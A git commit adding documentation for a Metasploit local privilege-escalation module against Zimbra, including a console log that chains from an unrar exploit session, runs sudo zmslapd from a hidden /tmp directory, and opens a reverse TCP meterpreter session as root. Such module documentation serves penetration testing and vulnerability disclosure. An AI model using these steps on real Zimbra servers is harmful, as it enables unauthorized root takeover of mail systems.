Add documentation
This commit is contained in:
parent
6e8d04ddc9
commit
be25e1fc77
|
@ -0,0 +1,47 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Currently, as of 2022-07-26, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I have an open security ticket with Zimbra.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Install Zimbra on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...
|
||||
|
||||
```
|
||||
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
10 meterpreter x86/linux zimbra @ zimbra.example.org 10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)
|
||||
|
||||
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
|
||||
SESSION => 10
|
||||
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.0.146:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Executing: sudo -n -l
|
||||
[+] The target is vulnerable.
|
||||
[*] Creating exploit directory: /tmp/.5kq9XO
|
||||
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
|
||||
[*] Sending stage (3020772 bytes) to 10.0.0.154
|
||||
[+] Deleted /tmp/.5kq9XO
|
||||
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
### SUDO_PATH
|
||||
|
||||
The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
|
||||
|
||||
### ZIMBRA_BASE
|
||||
|
||||
The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.
|
Loading…
Reference in New Issue